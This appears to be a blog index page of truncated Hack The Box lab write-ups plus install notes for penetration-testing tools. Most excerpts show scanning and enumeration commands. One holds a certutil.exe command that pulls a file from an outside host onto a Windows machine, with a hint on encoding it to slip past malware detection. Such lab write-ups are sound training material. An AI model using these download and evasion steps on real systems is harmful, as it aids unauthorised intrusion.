Pages

Search

HTB Curling

$ nmap -T4 -A -p- 10.10.10.150 $ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u http://10.10.10.150 -e If we access to http://10.10.10.150/administrator/, we’ll find a Joomla login form. Accessing to http://10.10.10.150, Based on the published post there are these users: Super User Floris Watching on the source code, there is a suspicious secret.txt file somewhere. http://10.10.10.150/secret.txt This string seems to be encoded. Searching for: «linux decode string», Google give us the suggestion of

HTB Postman

$ nmap -A -p- -T4 10.10.10.160 Open ports: 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 6379/tcp open redis Redis key-value store 4.0.9 10000/tcp open http MiniServ 1.910 (Webmin httpd) $ gobuster dir -u http://10.10.10.160 -w Access to http://10.10.10.160 Access to http://10.10.10.160:10000 Access to https://10.10.10.160:1000 Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and

HTB Writeup

$ nmap -A -T4 -p- -sV 10.10.10.138 Although nmap says port 80 is open, it also appears to be as tcpwrapped.What does it mean? Tcpwrapped refers to tcpwrapper, a host-based network access control program on Unix and Linux. When Nmap labels something tcpwrapped, it means that the behavior of the port is consistent with one that is protected by tcpwrapper. Specifically, it means that a full TCP handshake was completed,

HTB Irked

$ nmap -A -T4 -p- 10.10.10.117 Access to http://10.10.10.117 According to Nmap’s results, we have open these ports related to UrealIRCd: 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 65534/tcp open irc UnrealIRCd (Admin email djmardov@irked.htb) As we have an IRC in this box let’s start trying to connect to it. $ sudo irssi 10.10.10.117 65534 According to this, we have a UnrealIRC version 3.2.8.1 $ searchsploit unrealirc Exploiting UnrealIRC

HTB OpenAdmin

Enumeration $ nmap -A -T4 -p- 10.10.10.171 $ gobuster dir -u 10.10.10.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e Access to http://10.10.10.171 Access to http://10.10.10.171/music There is a login link. Click and you’ll be redirected to http://10.10.10.171/ona Based on this screenshot, we have an OpenNetAdmin (v18.1.1) Access to http://10.10.10.171/sierra Access to http://10.10.10.171/artwork Vulnerability analysis $ searchsploit opennetadmin $ searchsploit -x 47691 The -d option in Curl means data. -d, –data: (HTTP MQTT) Sends the specified data in a POST

HTB Friendzone

$ sudo nmap -A -T4 -p- 10.10.10.123 $ gobuster -w /usr/share/wordlists/dirb/common.txt dir -u http://10.10.10.123/ Access to http://10.10.10.123 Acess to https://10.10.10.123/ We discovered that SSL cert is using a common name as friendzone.red (it is a vhost).So we can access then to https://friendzone.red/ (after this host was added to the /etc/host file) We can do a zone transfer for that domain I saw earlier on the main page and get the

HTB Access

$ nmap -A -T4 -p- 10.10.10.98 Open ports detected:• 21/tcp open ftp Microsoft ftpd• 23/tcp open telnet?• 80/tcp open http Microsoft IIS httpd 7.5 $ ftp 10.10.10.98 ftp> dir ftp> cd Backupsftp> dir ftp> get backup.mdb ftp> cd ..ftp> dir ftp> cd Engineerftp> dir ftp> get «Access Control.zip» Files haven’t been correctly downloaded.By default, ftp mode set for text files.We need to download again this files but this time using

Impacket installation

Impacket is a collection of Python classes for working with network protocols. https://github.com/SecureAuthCorp/impacket Installation process: Download last release. Extract the file. Install the requirements. Install the package. $ pip install -r requirements.txt If we have an error installing wheel package, we can do it individually. $ pip install wheel Now run the configuration script. $ python setup.py bdist_wheel Let’s try to install the requirements again: $ pip install -r requirements.txt

Download a file using Certutil.exe

Certutil.exe can be used to download a file to a Windows machine. This command will download the «file» in the Windows machine from «http://<ip>« certutil.exe -urlcache -split -f http:///file file Depending on the file, it could be detected as malicious and then be blocked. A possible solution may be using the method described in this post from https://www.bleepingcomputer.com. The trick is based on a base64 encoding file when sending the

Autorecon install

AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. It is intended as a time-saving tool for use in CTFs and other penetration testing environments (e.g. OSCP). It may also be useful in real-world engagements. https://github.com/Tib3rius/AutoRecon Run installation script $ python3 -m pip install git+https://github.com/Tib3rius/AutoRecon.git Add /home/ruben/.local/bin to your PATH. Other requirements installation: & sudo apt install seclists curl enum4linux gobuster nbtscan nikto nmap onesixtyone oscanner